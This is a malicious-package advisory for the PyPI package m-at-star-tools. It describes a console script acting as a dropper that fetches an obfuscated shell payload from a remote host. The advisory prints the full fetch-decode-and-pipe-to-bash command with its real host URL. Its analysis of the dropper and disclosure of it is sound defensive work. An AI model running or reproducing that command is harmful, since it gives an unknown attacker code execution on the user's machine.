Malicious code in m-at-star-tools (PyPI)

---

__

Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2)

The package's sole console_script m0scan (m0scan/main.py:6-7) executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (mspy.qzz.io) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls mspy.qzz.io/M0scan controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author M-AT-STAR, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.

Source: kam193 (1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1)

The package downloads remote encoded code, which then downloads the next encrypted stage. The encryption of final data requires knowing a code.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-m-at-star-tools

Reasons (based on the campaign):

• Downloads and executes a remote malicious script.

• obfuscation